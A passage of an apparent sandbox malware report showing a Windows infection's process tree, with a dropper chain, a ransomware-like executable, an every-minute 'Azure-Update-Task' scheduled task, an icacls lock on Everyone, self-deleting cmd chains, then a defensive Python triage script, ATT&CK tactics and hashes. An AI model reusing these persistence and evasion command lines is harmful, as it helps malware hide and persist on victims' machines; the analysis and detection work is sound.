C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\paau0ga2.dmq\gcleaner.exe /mixfive & exit5⤵PID:1052
-
C:\Users\Admin\AppData\Local\Temp\paau0ga2.dmq\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\paau0ga2.dmq\gcleaner.exe /mixfive6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2120 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\paau0ga2.dmq\gcleaner.exe" & exit7⤵PID:2980
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f8⤵
- Kills process with taskkill
PID:436 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2po3pay4.up2\autosubplayer.exe /S & exit5⤵PID:2156
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2568 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:2576
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:2824 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3357038103890CB74DA0F3E186CE311B C2⤵PID:1208
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9F390E3CD75E85D9C096B2FC1D2786C42⤵
- Blocklisted process makes network request
PID:2848 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:2440 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding ADA8DC425C27DE4B120E8174DFE95230 M Global\MSI00002⤵PID:960
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1360 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2296
-
C:\Users\Admin\AppData\Local\Temp\510D.exeC:\Users\Admin\AppData\Local\Temp\510D.exe1⤵
- Executes dropped EXE
PID:1780
-
C:\Users\Admin\AppData\Local\Temp\6AA6.exeC:\Users\Admin\AppData\Local\Temp\6AA6.exe1⤵
- Executes dropped EXE
PID:1964
-
C:\Users\Admin\AppData\Local\Temp\8BAE.exeC:\Users\Admin\AppData\Local\Temp\8BAE.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\8BAE.exeC:\Users\Admin\AppData\Local\Temp\8BAE.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2448 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:592 -
C:\Users\Admin\AppData\Local\Temp\8BAE.exe"C:\Users\Admin\AppData\Local\Temp\8BAE.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:2908
-
C:\Users\Admin\AppData\Local\Temp\8BAE.exe"C:\Users\Admin\AppData\Local\Temp\8BAE.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Modifies extensions of user files
PID:2128 -
C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe"C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2028 -
C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe"C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2536 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe" & del C:\ProgramData\*.dll & exit7⤵PID:1156
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
PID:744 -
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:752 -
C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build3.exe"C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build3.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2636 -
C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build3.exe"C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build3.exe"6⤵
- Executes dropped EXE
PID:2724 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
PID:2504
-
C:\Users\Admin\AppData\Local\Temp\BEEF.exeC:\Users\Admin\AppData\Local\Temp\BEEF.exe1⤵
- Executes dropped EXE
PID:2532 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\BEEF.exe"2⤵PID:2196
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:2148 -
C:\Users\Admin\AppData\Local\Temp\WnUKuKwEyu.exe"C:\Users\Admin\AppData\Local\Temp\WnUKuKwEyu.exe"2⤵
- Executes dropped EXE
PID:1528 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"3⤵
- Creates scheduled task(s)
PID:2336
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2908
-
C:\Windows\system32\taskeng.exetaskeng.exe {9A49859D-4422-408C-A7FB-6EBFD1C6673C} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]1⤵PID:2856
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2400 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
PID:688 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- Creates scheduled task(s)
PID:2084 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1956 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
PID:2456 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1732 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
PID:1504 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7960 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
PID:7976 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2504 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
PID:2340 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7956 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
PID:8012 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:8028 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
PID:7956 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:7944 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:8000
-
C:\Users\Admin\AppData\Roaming\avwvuuwC:\Users\Admin\AppData\Roaming\avwvuuw2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7964 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:7728 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:7684
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:1160 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:7692
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:8080 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:2624
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:7724 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:7868
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:7760 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:7748
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:2368 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:1768
-
C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exeC:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:7704 -
C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exeC:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe --Task3⤵PID:8068
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:7216 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:7244
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:7508 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:7532
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:4484 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:4520
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:4952 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:5044
-
C:\Users\Admin\AppData\Roaming\avwvuuwC:\Users\Admin\AppData\Roaming\avwvuuw2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4964 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:4676 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:4880
-
C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exeC:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:4728 -
C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exeC:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe --Task3⤵PID:4804
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:3336 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:3376
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:3872 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:3892
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:3960 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:3964
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:7612 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:3184
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:328 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:1272
-
C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exeC:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:4660 -
C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exeC:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe --Task3⤵PID:4964
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:1520 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:828
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:5000 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:3152
-
C:\Users\Admin\AppData\Local\Temp\4010.exeC:\Users\Admin\AppData\Local\Temp\4010.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2432
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-244508444862206081-212929308874554396-3793658631545669950119089633970821402"1⤵PID:2504
-
C:\Users\Admin\AppData\Local\Temp\629F.exeC:\Users\Admin\AppData\Local\Temp\629F.exe1⤵
- Executes dropped EXE
PID:2272 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 629F.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\629F.exe" & del C:\ProgramData\*.dll & exit2⤵PID:2568
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 629F.exe /f3⤵
- Kills process with taskkill
PID:880 -
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:1548
-
C:\Users\Admin\AppData\Local\Temp\A8B4.exeC:\Users\Admin\AppData\Local\Temp\A8B4.exe1⤵
- Executes dropped EXE
PID:1480 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\A8B4.exe"2⤵
- Checks processor information in registry
PID:2272 -
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:2028
-
C:\Windows\system32\taskeng.exetaskeng.exe {7C2F96A0-D5EF-44D5-978F-EB09A410BAE3} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2580
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 80802⤵
- Executes dropped EXE
PID:1756 -
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 80802⤵
- Executes dropped EXE
PID:1808 -
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵
- Executes dropped EXE
PID:2032 -
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 80802⤵
- Executes dropped EXE
PID:4344 -
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 80802⤵
- Executes dropped EXE
PID:4372 -
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵
- Executes dropped EXE
PID:5988 -
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵PID:4992
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵PID:5028
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 80802⤵PID:4696
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 80802⤵PID:3120
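The process tree above records behaviour as sandbox signatures; the recurring patterns are an every-minute "Azure-Update-Task" schtasks registration pointing into the user's Roaming profile, an icacls deny for Everyone on the directory 8BAE.exe drops into, cmd.exe taskkill/timeout/del chains that remove the dropper that spawned them, rundll32 invoking sqlite.dll from %TEMP%, and pairs of processes where a parent flagged for SetThreadContext spawns a child with its own image. The following is an added example, not part of the Tria.ge report or of the sample, that turns those patterns into matchers over process events. The ProcEvent fields, the rule names and the benign control event (PIDs 9000/9001) are this example's own assumptions; the other events are constructed from command lines and PIDs shown in the tree.

```python
"""Rule-based triage over a sandbox process tree.

Added example, not from the report: each rule encodes one behaviour visible in
the tree above. ProcEvent, the rule names and the benign control event are this
example's own; the other SAMPLE events are constructed from reported command lines.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: Optional[int]
    image: str
    cmdline: str
    sigs: Tuple[str, ...] = ()  # sandbox signature names attached to the process


USER_PROFILE = re.compile(r"(?i)^C:\\Users\\[^\\]+\\AppData\\")


def flag_schtasks(ev: ProcEvent, _by_pid: Dict[int, ProcEvent]) -> Optional[str]:
    """Task firing every few minutes whose action lives in a user-writable profile path."""
    if not ev.image.lower().endswith("schtasks.exe"):
        return None
    sc = re.search(r"(?i)/sc\s+minute\s+/mo\s+(\d+)", ev.cmdline)
    tr = re.search(r'(?i)/tr\s+"([^"]+)"', ev.cmdline)
    if sc and tr and int(sc.group(1)) <= 5 and USER_PROFILE.match(tr.group(1)):
        return f"persistence: task every {sc.group(1)} min runs {tr.group(1)}"
    return None


def flag_icacls_deny(ev: ProcEvent, _by_pid: Dict[int, ProcEvent]) -> Optional[str]:
    """Everyone (S-1-1-0) denied delete on a directory, so the drop cannot be removed."""
    if not ev.image.lower().endswith("icacls.exe"):
        return None
    m = re.search(r'(?i)icacls\s+"([^"]+)"\s+/deny\s+\*?S-1-1-0:\(OI\)\(CI\)\(([^)]*)\)', ev.cmdline)
    if m and "DE" in m.group(2).upper().split(","):
        return f"defense evasion: icacls denies Everyone delete on {m.group(1)}"
    return None


def flag_rundll32_temp(ev: ProcEvent, _by_pid: Dict[int, ProcEvent]) -> Optional[str]:
    """rundll32 calling an export of a DLL that lives under %TEMP%."""
    if not ev.image.lower().endswith("rundll32.exe"):
        return None
    m = re.search(r'(?i)rundll32\.exe\s+"?([^",]+\.dll)"?,(\S+)', ev.cmdline)
    if m and re.search(r"(?i)\\AppData\\Local\\Temp\\", m.group(1)):
        return f"rundll32 loads {m.group(1)} export {m.group(2)} from %TEMP%"
    return None


def flag_self_delete(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> Optional[str]:
    """cmd.exe deleting an .exe it first taskkill'ed, or the image of its own parent."""
    if not ev.image.lower().endswith("cmd.exe"):
        return None
    deleted = re.search(r'(?i)\b(?:del|erase)\b[^&]*?"?([^\s"&]+\.exe)"?', ev.cmdline)
    if not deleted:
        return None
    target = deleted.group(1)
    killed = re.search(r'(?i)taskkill\s+/im\s+"?([^\s"]+)"?\s+/f', ev.cmdline)
    parent = by_pid.get(ev.ppid)
    if (killed and target.lower().endswith("\\" + killed.group(1).lower())) or (
            parent and parent.image.lower() == target.lower()):
        return f"self-deletion chain: cmd.exe removes {target}"
    return None


def flag_self_spawn_stc(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> Optional[str]:
    """Child has the parent's image and the parent set a thread context: hollowing-shaped."""
    parent = by_pid.get(ev.ppid)
    if parent and parent.image.lower() == ev.image.lower() \
            and "Suspicious use of SetThreadContext" in parent.sigs:
        return f"self-spawn with SetThreadContext (possible hollowing): PID {parent.pid} -> PID {ev.pid}"
    return None


RULES = (flag_schtasks, flag_icacls_deny, flag_rundll32_temp, flag_self_delete, flag_self_spawn_stc)


def triage(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, finding) pairs; a process may match more than one rule."""
    by_pid = {e.pid: e for e in events}  # assumes PIDs are unique within the event set
    return [(ev.pid, hit) for ev in events for rule in RULES if (hit := rule(ev, by_pid))]


BUILD3 = r"C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build3.exe"
SAMPLE = [  # constructed from the report's command lines and PIDs
    ProcEvent(2636, 2128, BUILD3, f'"{BUILD3}"', ("Executes dropped EXE", "Suspicious use of SetThreadContext")),
    ProcEvent(2724, 2636, BUILD3, f'"{BUILD3}"', ("Executes dropped EXE",)),
    ProcEvent(2504, 2724, r"C:\Windows\SysWOW64\schtasks.exe",
              r'/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"',
              ("Creates scheduled task(s)",)),
    ProcEvent(592, 2448, r"C:\Windows\SysWOW64\icacls.exe",
              r'icacls "C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97" /deny *S-1-1-0:(OI)(CI)(DE,DC)',
              ("Modifies file permissions",)),
    ProcEvent(1156, 2536, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q '
              r'"C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe" & del C:\ProgramData\*.dll & exit'),
    ProcEvent(2576, 2568, r"C:\Windows\SysWOW64\rundll32.exe",
              r'rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global', ("Loads dropped DLL",)),
    # benign control, invented for the example: hourly task whose action lives under Program Files
    ProcEvent(9001, 9000, r"C:\Windows\System32\schtasks.exe",
              r'/create /sc hourly /tn "Backup" /tr "C:\Program Files\Backup\bk.exe"'),
]

if __name__ == "__main__":
    for pid, finding in triage(SAMPLE):
        print(pid, finding)
```

Two caveats a practitioner would attach: a process spawning itself while the parent calls SetThreadContext is consistent with hollowing but is only confirmed by inspecting the child's memory, and PIDs are reused within this run (2504, 2568, 2272 and 2636 each appear on more than one process in the tree), so anything beyond a single snapshot should key by PID plus creation time rather than PID alone.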
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
- File and Directory Permissions Modification (1)
- Install Root Certificate (1)
- Modify Registry (3)
- Virtualization/Sandbox Evasion (1)
- Web Service (1)
Downloads
-
MD5 b904fb528fafefae5c59553a8c31291d
SHA1 0dc01712e88d5bb47cc8fb02678eb46466cc2442
SHA256 717b0790a5cc5b577fb2535effc00fb58a3d62e55537a3d3ae0bf6639e8c9474
SHA512 5a795d4bde04e489e688899937708bd6910d2a36d2b50397fca91590bb6e74921102cf1e4a52405488c6c4aeba92565794470007d6bb1e2f029d17d2095fa1ac
-
MD5 a1c7ed2563212e0aba70af8a654962fd
SHA1 987e944110921327adaba51d557dbf20dee886d5
SHA256 a15773680b31415eeebf20246f283857bda7e7dda16f4674c2cbeba2106e3592
SHA512 60d827b6d36d6f3a1b4af445b25f26812043d2be8934c338d29b8a1bbe0b50d8a7c06f54ea14afa1d9dbbc6340c649dc51b0ae12d77329e1fb6fdf99e896a462
-
MD5 f1e2bb0a62bf371a71b62224b18a69b8
